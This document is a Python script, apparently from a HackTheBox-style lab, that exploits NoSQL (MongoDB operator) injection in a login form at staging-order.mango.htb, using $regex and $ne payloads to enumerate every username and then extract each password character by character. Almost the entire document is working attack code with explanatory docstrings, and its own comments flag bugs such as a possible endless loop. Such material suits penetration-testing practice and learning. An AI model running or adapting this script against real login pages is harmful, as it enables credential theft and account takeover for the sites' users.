NoSQL

Script to brute-force (leak) user/pass from a NoSQL-injectable login:

import requests

class color:
    """ANSI escape sequences used to colour the script's terminal output.

    Each attribute is the raw control sequence; callers concatenate them
    around a string and terminate with ``END`` to reset the terminal state.
    """

    # Foreground colours.
    PURPLE = '\033[95m'
    CYAN = '\033[96m'
    DARKCYAN = '\033[36m'
    BLUE = '\033[94m'
    GREEN = '\033[92m'
    YELLOW = '\033[93m'
    RED = '\033[91m'

    # Text attributes.
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'

    # Reset everything back to the default rendering.
    END = '\033[0m'

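def inject(data):
    """Send one login POST and report whether the server treated it as a match.

    The callers build form keys such as ``username[$regex]`` and
    ``password[$ne]``; the target evidently parses these bracketed keys into
    MongoDB query operators instead of treating the credentials as plain
    strings. A server that validated credential fields as strings (rejecting
    operator-bearing keys / non-string values) would not expose this oracle.

    Args:
        data: dict of form fields for the login request.

    Returns:
        True when the response status is anything other than 200 (Burp showed
        a 301 on a successful match), False otherwise.
    """
    # Redirects are not followed so the raw 301 stays visible to the check.
    r = requests.post('http://staging-order.mango.htb/',
                      data=data, allow_redirects=False)
    # Explicit bool instead of the previous implicit None on the 200 path.
    return r.status_code != 200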

def leakUser(secret: str) -> None:
    """Recover one username beginning with *secret*, one lowercase letter at a time.

    Each round probes ``username[$regex]`` with an anchored prefix (``^`` +
    candidate) and keeps the first a-z letter for which inject() reports a
    match. After a successful extension the candidate equals the new prefix,
    so the exact-match probe ``^prefix$`` at the top of the loop fires once the
    whole name is known; the name is then printed and appended to the
    module-level ``userList``. If no a-z extension matches (e.g. the name
    continues with a character outside a-z) the function returns without a
    result.

    Args:
        secret: the known prefix; main() passes a single letter.
    """
    payload = ""
    notFound = False
    while True:
        # Exact-match probe of the current candidate (see docstring).
        data = {"username[$regex]":"^"+payload+"$", "password[$ne]":"asdjkf", "login":"login"}
        if inject(data):  # stop the loop once we no longer have accurate guesses
            print(color.GREEN +color.BOLD +"\r"+payload + color.END, flush=True)
            userList.append(payload)
            break  # leave the function once a user has been found
        if notFound:
            #print("\r", flush=True)
            break
        for i in range(97, 123):  # ASCII range for lowercase a-z
            payload = secret + chr(i)
            print("\r"+payload, flush=False, end='')
            data = {"username[$regex]": "^" + payload, "password[$ne]":"asdjkf", "login":"login"}
            if inject(data):
                print("\r"+payload, flush=True, end='')
                secret = secret + chr(i)
                notFound = False
                break
            # Reached only for a non-matching letter; stays True when the
            # whole range is exhausted, which ends the outer loop next round.
            notFound = True

def leakPass(user: str) -> None:
    """Recover the password of *user* one printable ASCII character at a time.

    Sends the fixed ``username`` together with ``password[$regex]`` set to an
    anchored prefix (``^`` + candidate); a match reported by inject() confirms
    the prefix and the character is kept. Regex metacharacters in the escape
    list below are backslash-escaped so they match literally. ``$`` (ASCII 36)
    is not in that list, so once the full password is known ``^password$``
    still matches and a ``$`` is appended on two consecutive rounds; the
    ``$$`` suffix is then stripped and the password printed.

    Args:
        user: the username whose password is being recovered (from leakUser()).
    """
    payload = ""
    secret = ""
    while True:
        # NOTE(review): this probe sends the password candidate as a username
        # regex, so it can only fire if an account is named exactly like the
        # candidate; in practice termination comes from the "$$" check below.
        data = {"username[$regex]":"^"+payload+"$", "password[$ne]":"randtext", "login":"login"}
        if inject(data):  # stop the loop once we no longer have accurate guesses
            break
        if payload.endswith("$$"):
            print(color.RED +color.BOLD + "\r"+payload[:-2]+color.END, flush=True)
            break
        # NOTE(review): there is no "not found" flag here; if no candidate in
        # the range matches, the outer loop repeats indefinitely.
        for i in range(32, 127):  # printable ASCII range
            if chr(i) in ['.','?','*','^','+','|']:
                # escape regex metacharacters so they are matched literally
                payload = secret + "\\" + chr(i)
            else:
                payload = secret + chr(i)
            print("\r"+ payload, flush=False, end='')
            data = {"username": user, "password[$regex]":"^"+payload, "login":"login"}
            if inject(data):
                print("\r"+payload, flush=True, end='')
                secret = secret + chr(i)
                break

if __name__ == '__main__':
    # Module-level state: leakUser() appends every recovered name to userList.
    secret = ""  # force start of enumeration with a letter or name
    userList = []
    print()
    print(color.YELLOW +color.BOLD + color.UNDERLINE + "---Leaking NoSQL Users---" +color.END)
    # One leakUser() run per lowercase starting letter.
    for letter in map(chr, range(97, 123)):
        leakUser(letter)
    print(color.YELLOW +color.BOLD + color.UNDERLINE + '\r'+ "---Leaking NoSQL Passwords---" +color.END, flush=True)
    # Then recover a password for each name found above.
    for user in userList:
        print(color.GREEN +color.BOLD + '+ '+user+" +"+color.END)
        leakPass(user)

    print()
    exit(0)
